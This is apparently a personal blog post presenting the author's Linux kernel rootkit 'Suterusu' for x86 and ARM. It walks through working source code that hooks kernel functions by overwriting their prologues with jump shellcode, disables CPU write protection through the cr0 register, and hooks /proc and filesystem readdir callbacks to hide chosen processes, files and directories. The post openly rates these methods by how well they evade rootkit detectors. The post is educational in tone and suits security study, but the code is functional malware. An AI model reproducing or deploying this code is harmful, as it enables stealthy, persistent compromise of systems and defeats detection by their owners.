Table of Contents

Introduction

A number of months ago, I added a new project to the redmine tracker github showcasing some code I worked on over the summer (https://github.com/mncoppola/suterusu).

Through my various router persistence and kernel exploitation adventures, I’ve taken a recent interest in Linux kernel rootkits and what makes them tick. I did some searching around mainly in the packetstorm.org archive and whatever blogs turned up, but to my surprise there really wasn’t much to be found in the realm of modern public Linux rootkits. The most prominent results centered around adore-ng, which hasn’t been updated since 2007 (at least, from the looks of it), and a few miscellaneous names like suckit, kbeast, and Phalanx. A lot changes in the kernel from year to year, and I was hoping for something a little more recent.

So, like most of my projects, I said “screw it” and opened vim. I’ll write my own rootkit designed to work on modern systems and architectures, and I’ll learn how they work through the act of doing it myself. I’d like to (formally) introduce you to Suterusu, my personal kernel rootkit project targeting Linux 2.6 and 3.x on x86 and ARM.

There’s a lot to talk about in the way of techniques, design, and implementation, but I’ll start out with some of the basics. Suterusu currently sports a large array of features, with many more in staging, but it may be more appropriate to devote separate blog posts to these.

Function Hooking in Suterusu

Most rootkits traditionally perform system call hooking by swapping out function pointers in the system call table, but this technique is well known and trivially detectable by intelligent rootkit detectors. Instead of pursuing this route, Suterusu utilizes a different technique and performs hooking by modifying the prologue of the target function to transfer execution to the replacement routine. This can be observed by examining the following four functions:

hijack_start()

hijack_pause()

hijack_resume()

hijack_stop()

These functions track hooks through a linked list of sym_hook structs, defined as:

struct sym_hook { void *addr; unsigned char o_code[HIJACK_SIZE]; unsigned char n_code[HIJACK_SIZE]; struct list_head list; }; LIST_HEAD(hooked_syms);

To fully understand the hooking process, let’s step through some code.

Function Hooking on x86

Most of the weight is carried by the hijack_start() function, which takes as arguments pointers to the target routine and the “hook-with” routine:

void hijack_start ( void *target, void *new ) { struct sym_hook *sa; unsigned char o_code[HIJACK_SIZE], n_code[HIJACK_SIZE]; unsigned long o_cr0; // push $addr; ret memcpy(n_code, "\x68\x00\x00\x00\x00\xc3", HIJACK_SIZE); *(unsigned long *)&n_code[1] = (unsigned long)new; memcpy(o_code, target, HIJACK_SIZE); o_cr0 = disable_wp(); memcpy(target, n_code, HIJACK_SIZE); restore_wp(o_cr0); sa = kmalloc(sizeof(*sa), GFP_KERNEL); if ( ! sa ) return; sa->addr = target; memcpy(sa->o_code, o_code, HIJACK_SIZE); memcpy(sa->n_code, n_code, HIJACK_SIZE); list_add(&sa->list, &hooked_syms); }

A small-sized shellcode buffer is initialized with a “push dword 0; ret” sequence, of which the pushed value is patched with the pointer of the hook-with function. HIJACK_SIZE number of bytes (equivalent to the size of the shellcode) are copied from the target function and the prologue is then overwritten with the patched shellcode. At this point, all function calls to the target function will redirect to our hook-with function.

The final step is to store the target function pointer, original code, and hook code to the linked list of hooks, thus completing the operation. The remaining hijack functions operate on this linked list.

hijack_pause() uninstalls the desired hook temporarily:

void hijack_pause ( void *target ) { struct sym_hook *sa; list_for_each_entry ( sa, &hooked_syms, list ) if ( target == sa->addr ) { unsigned long o_cr0 = disable_wp(); memcpy(target, sa->o_code, HIJACK_SIZE); restore_wp(o_cr0); } }

hijack_resume() reinstalls the hook:

void hijack_resume ( void *target ) { struct sym_hook *sa; list_for_each_entry ( sa, &hooked_syms, list ) if ( target == sa->addr ) { unsigned long o_cr0 = disable_wp(); memcpy(target, sa->n_code, HIJACK_SIZE); restore_wp(o_cr0); } }

hijack_stop() uninstalls the hook and deletes it from the linked list:

void hijack_stop ( void *target ) { struct sym_hook *sa; list_for_each_entry ( sa, &hooked_syms, list ) if ( target == sa->addr ) { unsigned long o_cr0 = disable_wp(); memcpy(target, sa->o_code, HIJACK_SIZE); restore_wp(o_cr0); list_del(&sa->list); kfree(sa); break; } }

Write Protection on x86

Since kernel text pages are marked read-only, attempting to overwrite a function prologue in this region of memory will produce a kernel oops. This protection may be trivially circumvented however by setting the WP bit in the cr0 register to 0, disabling write protection on the CPU. Wikipedia’s article on control registers confirms this property:

BIT NAME FULL NAME DESCRIPTION 16 WP Write protect Determines whether the CPU can write to pages marked read-only

The WP bit will need to be set and reset at multiple points in the code, so it makes programmatic sense to abstract the operations. The following code originates from the PaX project, specifically from the native_pax_open_kernel() and native_pax_close_kernel() routines. Extra caution is taken to prevent a potential race condition caused by unlucky scheduling on SMP systems, as explained in a blog post by Dan Rosenberg:

inline unsigned long disable_wp ( void ) { unsigned long cr0; preempt_disable(); barrier(); cr0 = read_cr0(); write_cr0(cr0 & ~X86_CR0_WP); return cr0; } inline void restore_wp ( unsigned long cr0 ) { write_cr0(cr0); barrier(); preempt_enable_no_resched(); }

Function Hooking on ARM

A number of significant changes exist in the hijack_* set of hooking routines depending on whether the code is compiled for x86 or ARM. For instance, the concept of a WP bit does not exist on ARM while special care must be taken to handle data and instruction caching introduced by the architecture. While the concepts of data and instruction caching do exist on the x86 and x86_64 architectures, such features did not pose an obstacle during development.

Modified to address these new architectural characteristics is a version of hijack_start() specific to ARM:

void hijack_start ( void *target, void *new ) { struct sym_hook *sa; unsigned char o_code[HIJACK_SIZE], n_code[HIJACK_SIZE]; if ( (unsigned long)target % 4 == 0 ) { // ldr pc, [pc, #0]; .long addr; .long addr memcpy(n_code, "\x00\xf0\x9f\xe5\x00\x00\x00\x00\x00\x00\x00\x00", HIJACK_SIZE); *(unsigned long *)&n_code[4] = (unsigned long)new; *(unsigned long *)&n_code[8] = (unsigned long)new; } else // Thumb { // add r0, pc, #4; ldr r0, [r0, #0]; mov pc, r0; mov pc, r0; .long addr memcpy(n_code, "\x01\xa0\x00\x68\x87\x46\x87\x46\x00\x00\x00\x00", HIJACK_SIZE); *(unsigned long *)&n_code[8] = (unsigned long)new; target--; } memcpy(o_code, target, HIJACK_SIZE); memcpy(target, n_code, HIJACK_SIZE); cacheflush(target, HIJACK_SIZE); sa = kmalloc(sizeof(*sa), GFP_KERNEL); if ( ! sa ) return; sa->addr = target; memcpy(sa->o_code, o_code, HIJACK_SIZE); memcpy(sa->n_code, n_code, HIJACK_SIZE); list_add(&sa->list, &hooked_syms); }

As displayed above, shellcodes for ARM and Thumb are included to redirect execution, similar to those on x86/_64.

Instruction Caching on ARM

Most Android devices do not enforce read-only kernel page permissions, so at least for now we can forego any potential voodoo magic to write to protected memory regions. It is still necessary, however, to consider the concept of instruction caching on ARM when performing a function hook.

ARM CPUs utilize a data cache and instruction cache for performance benefits. However, modifying code in-place may cause the instruction cache to become incoherent with the actual instructions in memory. According to the official ARM technical reference, this issue becomes readily apparent when developing self-modifying code. The solution is to simply flush the instruction cache whenever a modification to kernel text is made, which is accomplished by a call to the kernel routine flush_icache_range():

void cacheflush ( void *begin, unsigned long size ) { flush_icache_range((unsigned long)begin, (unsigned long)begin + size); }

Pros and Cons of Inline Hooking

As with most techniques, inline function hooking presents various benefits and detriments when compared to simply hijacking the system call table:

Pro: Any function may be hijacked, not just system calls.

Pro: Less commonly implemented in rootkits, so it is less likely to be detected by rootkit detectors. It is also easy to circumvent simple hook detection engines due to the flexibility of assembly languages. A variety of detection evasion techniques for x86 may be found in the article x86 API Hooking Demystified.

Pro: Inline function hooking may be applied to userland with minimal/no modification. While working on the Android port of DMTCP, an application checkpointing tool out of Northeastern’s HPC lab, it was possible to simply copy and paste the entirety of the hijack_* routines, modified only to use userland linked lists.

Con: The current hooking implementation is not thread-safe. By temporarily unhooking a function via hijack_pause(), a race window is opened for other threads to execute the unhooked function before hijack_resume() is called. Potential solutions include crafty use of locking and permanently hijacking the target function and inserting extra logic within the hook-with routine. However, with the latter option, special care must be taken when executing the original function prologue on architectures characterized by variable-length instructions (x86/_64) and PC/IP-relative addressing (x86_64 and ARM).

Con: Another harmful possibility in the current implementation is hook recursion. Moreso an issue of poor implementation than any insurmountable design flaw, there are various easy solutions to the problem of having your hook-with function accidentally call the hooked function itself, leading to infinite recursion. Great information on the topic and proof of concept code can (once again) be found in the article x86 API Hooking Demystified.

Hiding Processes, Files, and Directories

Once a reliable hooking “framework” is implemented, it’s fairly trivial to start intercepting interesting functions and doing interesting things. One of the most basic things a rootkit must do is hide processes and filesystem objects, both of which may be accomplished with the same basic technique.

In the Linux kernel, one or more instances of the file_operations struct are associated with each supported filesystem (usually one instance for files and one for directories, but dig into the kernel source code and you’ll find that filesystems are a certain kind of special). These structs contain pointers to the routines associated with different file operations, for instance reading, writing, mmap’ing, modifying permissions, etc. For explicatory purposes, we will examine the instantiation of the file_operations struct on ext3 for directory objects:

const struct file_operations ext3_dir_operations = { .llseek = generic_file_llseek, .read = generic_read_dir, .readdir = ext3_readdir, .unlocked_ioctl = ext3_ioctl, #ifdef CONFIG_COMPAT .compat_ioctl = ext3_compat_ioctl, #endif .fsync = ext3_sync_file, .release = ext3_release_dir, };

To hide an object on the filesystem, it is possible to simply hook the readdir function and filter out any undesired items from its output. To maintain a level of system agnosticism, Suterusu dynamically obtains the pointer to a filesystem’s active readdir routine by navigating the target object’s file struct:

void *get_vfs_readdir ( const char *path ) { void *ret; struct file *filep; if ( (filep = filp_open(path, O_RDONLY, 0)) == NULL ) return NULL; ret = filep->f_op->readdir; filp_close(filep, 0); return ret; }

The actual hook process (for hiding items in /proc) looks like:

#if LINUX_VERSION_CODE > KERNEL_VERSION(2, 6, 30) proc_readdir = get_vfs_readdir("/proc"); #endif hijack_start(proc_readdir, &n_proc_readdir);

The kernel version check is in response to a change implemented in version 2.6.31 that removes the exported proc_readdir() symbol from include/linux/proc_fs.h. In previous versions it was possible to simply retrieve the pointer value externally upon linking, but rootkit developers are now forced to obtain it by alternate, manual means.

To perform the actual hiding of an objects in /proc, Suterusu hooks proc_readdir() with the following routine:

static int (*o_proc_filldir)(void *__buf, const char *name, int namelen, loff_t offset, u64 ino, unsigned d_type); int n_proc_readdir ( struct file *file, void *dirent, filldir_t filldir ) { int ret; o_proc_filldir = filldir; hijack_pause(proc_readdir); ret = proc_readdir(file, dirent, &n_proc_filldir); hijack_resume(proc_readdir); return ret; }

The real heavy lifting occurs in the filldir function, which serves as a callback executed for each item in the directory. This is replaced with a malicious n_proc_filldir() function, as follows:

static int n_proc_filldir( void *__buf, const char *name, int namelen, loff_t offset, u64 ino, unsigned d_type ) { struct hidden_proc *hp; char *endp; long pid; pid = simple_strtol(name, &endp, 10); list_for_each_entry ( hp, &hidden_procs, list ) if ( pid == hp->pid ) return 0; return o_proc_filldir(__buf, name, namelen, offset, ino, d_type); }

Since the intention is to hide processes by hijacking the readdir/filldir routines of /proc, Suterusu simply performs a match of the object name against a linked list of all PIDs the user wishes to hide. If a match is found, the callback returns 0 and the item is hidden from the directory listing. Otherwise, the original proc_filldir() function is executed and its value returned.

This same concept applies for hiding files and directories, except a direct string match against the object name is performed instead of converting the PID name to a number type first:

static int n_root_filldir( void *__buf, const char *name, int namelen, loff_t offset, u64 ino, unsigned d_type ) { struct hidden_file *hf; list_for_each_entry ( hf, &hidden_files, list ) if ( ! strcmp(name, hf->name) ) return 0; return o_root_filldir(__buf, name, namelen, offset, ino, d_type); }